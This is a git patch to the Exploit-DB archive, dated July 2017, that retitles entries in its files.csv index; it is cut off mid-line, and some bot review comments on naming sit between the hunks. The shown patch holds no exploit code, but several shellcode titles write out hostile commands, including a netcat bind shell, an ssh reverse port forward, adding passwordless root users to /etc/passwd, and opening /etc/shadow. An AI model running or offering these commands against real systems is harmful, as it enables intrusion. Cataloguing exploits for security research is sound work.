From ed107bc7117bfb3e344240e99efa0970e62db533 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 12 Jul 2017 05:01:24 +0000
Subject: [PATCH] DB: 2017-07-12

9 new exploits

Apache 2.0.52 - HTTP GET request Denial of Service
Apache 2.0.52 - GET Request Denial of Service

Microsoft IIS - Malformed HTTP Request Denial of Service (1)
Microsoft IIS - Malformed HTTP Request Denial of Service (2)
Microsoft IIS - HTTP Request Denial of Service (1)
Microsoft IIS - HTTP Request Denial of Service (2)

Microsoft IIS - Malformed HTTP Request Denial of Service
Microsoft IIS - HTTP Request Denial of Service

Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)
Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)

Allegro RomPager 2.10 - Malformed URL Request Denial of Service
Allegro RomPager 2.10 - URL Request Denial of Service

AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service
AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service

Netwin SurgeFTP 1.0b - Malformed Request Denial of Service
Netwin SurgeFTP 1.0b - Denial of Service

iCal 3.7 - Malformed HTTP Request Denial of Service
iCal 3.7 - HTTP Request Denial of Service

3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service
3ware Disk Managment 1.10 - HTTP Request Denial of Service

Pi3Web 2.0.1 - Malformed GET Request Denial of Service
Pi3Web 2.0.1 - GET Request Denial of Service

Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service
Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service

Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service
Linksys PSUS4 PrintServer - POST Request Denial of Service

Multiple IEA Software Products - HTTP POST Request Denial of Service
Multiple IEA Software Products - POST Request Denial of Service

Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service
Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service

Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service
Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service

D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow
D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow

Pelco VideoXpert 1.12.105 - Privilege Escalation

Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure

Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree

PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow
PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow

AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow
AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow

Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow
Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow

JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure

Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)

Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)

Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)
NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection
Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)
(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)

Linux/x86-64 - flush iptables rules Shellcode (84 bytes)
Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)

Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)
Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)

Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes)
Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)

Linux/x86 - File unlinker Shellcode (18+ bytes)
Linux/x86 - Perl script execution Shellcode (99+ bytes)
Linux/x86 - file reader Shellcode (65+ bytes)
Linux/x86 - File Unlinker Shellcode (18+ bytes)
Linux/x86 - Perl Script Execution Shellcode (99+ bytes)
Linux/x86 - File Reader Shellcode (65+ bytes)

Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes)
Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)

Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)

Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)
Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)

Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes)
Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)

Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)
Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)
Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)
Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)

Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)
Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)
Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)

Linux/x86 - Add User 't00r' Shellcode (82 bytes)
Linux/x86 - Add User (t00r) Shellcode (82 bytes)

Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)
Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)
Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)

Linux/x86 - Add User 'z' Shellcode (70 bytes)
Linux/x86 - Add User (z) Shellcode (70 bytes)

Linux/x86 - hard / unclean reboot Shellcode (29 bytes)
Linux/x86 - hard / unclean reboot Shellcode (33 bytes)
Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes)
Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes)

Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)
Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)

Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)
Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)

Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)
Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)

Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)
Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)

Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)
Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)

Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)
Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)

Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)

Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)

Linux/x86 - /bin/sh ROT7 Encoded Shellcode
Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode

Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode
Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode

Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)
Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)

Linux/x86-64 - Bind NetCat Shellcode (64 bytes)
Linux/x86-64 - Bind Netcat Shellcode (64 bytes)

Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)
Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)

Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)
Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)
Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)
Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes)

Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)
Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)

Linux/x86-64 - Reverse NetCat Shellcode (72 bytes)
Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes)
Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)

Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass
Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass

NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection

Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting
Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)
Pelco Sarix/Spectra Cameras - Remote Code Execution
Pelco VideoXpert 1.12.105 - Directory Traversal
Pelco VideoXpert 1.12.105 - Information Disclosure
NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection
---
 files.csv | 148 ++---
 platforms/hardware/webapps/42307.txt | 168 ++++++
 platforms/hardware/webapps/42308.txt | 82 +++
 platforms/hardware/webapps/42309.txt | 191 +++++++
 platforms/linux/{remote => webapps}/42306.txt | 0
 platforms/linux/webapps/42314.txt | 28 +
 platforms/windows/local/42310.txt |
107 ++++ platforms/windows/remote/42315.py | 538 ++++++++++++++++++ platforms/windows/webapps/42311.txt | 149 +++++ platforms/windows/webapps/42312.txt | 81 +++ 10 files changed, 1422 insertions(+), 70 deletions(-) create mode 100755 platforms/hardware/webapps/42307.txt create mode 100755 platforms/hardware/webapps/42308.txt create mode 100755 platforms/hardware/webapps/42309.txt rename platforms/linux/{remote => webapps}/42306.txt (100%) create mode 100755 platforms/linux/webapps/42314.txt create mode 100755 platforms/windows/local/42310.txt create mode 100755 platforms/windows/remote/42315.py create mode 100755 platforms/windows/webapps/42311.txt create mode 100755 platforms/windows/webapps/42312.txt diff --git a/files.csv b/files.csv index 8547530fb..89e6a75fe 100644 --- a/files.csv +++ b/files.csv @@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port 843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 -855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 +855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 
@@ -264,12 +264,12 @@ id,file,description,date,author,platform,type,port 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0 1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 -1376,platforms/windows/dos/1376.c,"Microsoft IIS - Malformed HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 -1377,platforms/windows/dos/1377.pl,"Microsoft IIS - Malformed HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0 +1376,platforms/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 +1377,platforms/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 -1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 +1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 
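Review bot: after this hunk the three IIS entries 1376, 1377 and 1396 all carry the title "Microsoft IIS - HTTP Request Denial of Service", and only the first two keep a "(1)"/"(2)" suffix; 1396 (the '+' line "Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex) has no suffix, so the description column no longer distinguishes it from the pair above it. Suggest giving 1396 a "(3)" suffix, or keeping a qualifier that separates it, so the titles stay unique.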
@@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 -5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 +5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 
@@ -1274,7 +1274,7 @@ id,file,description,date,author,platform,type,port 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21 10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 -10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - Malformed URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80 +10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80 10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos,0 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 
@@ -2364,7 +2364,7 @@ id,file,description,date,author,platform,type,port 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0 -19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service",2000-04-12,eAX,windows,dos,0 +19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service",2000-04-12,eAX,windows,dos,0 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0 
@@ -2499,7 +2499,7 @@ id,file,description,date,author,platform,type,port 20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos,0 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0 -20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 +20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0 
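Review bot: the '+' line for 20659 shortens the title to "Netwin SurgeFTP 1.0b - Denial of Service", dropping the request vector entirely, while the other retitles in this patch (10237, 22117, 22587 and others) keep a "... Request Denial of Service" form; the same happens to 19843 ("AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service") in the preceding hunk. Consider keeping "Request" in both so the description still says how the crash is triggered and the naming stays consistent across the batch.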
@@ -2749,7 +2749,7 @@ id,file,description,date,author,platform,type,port 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0 22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 -22117,platforms/windows/dos/22117.txt,"iCal 3.7 - Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 +22117,platforms/windows/dos/22117.txt,"iCal 3.7 - HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0 22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 
@@ -2765,7 +2765,7 @@ id,file,description,date,author,platform,type,port 22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",linux,dos,0 22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos,0 -22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0 +22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0 22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0 22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 
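Review bot: the '+' line for 22207 rewrites the description but keeps the misspelled product name "3ware Disk Managment"; since this line is being touched anyway, correct it to "3ware Disk Management" in the same change (the commit message repeats the misspelling, so fix it there too).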
@@ -2850,7 +2850,7 @@ id,file,description,date,author,platform,type,port 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0 -22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 +22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos,0 
@@ -3068,7 +3068,7 @@ id,file,description,date,author,platform,type,port 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 -23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 +23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0 
@@ -3318,7 +3318,7 @@ id,file,description,date,author,platform,type,port 25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0 -25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 +25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 
@@ -3922,7 +3922,7 @@ id,file,description,date,author,platform,type,port 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 -31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 +31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 
@@ -4015,7 +4015,7 @@ id,file,description,date,author,platform,type,port 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0 31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0 -31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 +31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 31889,platforms/novell/dos/31889.pl,"Novell 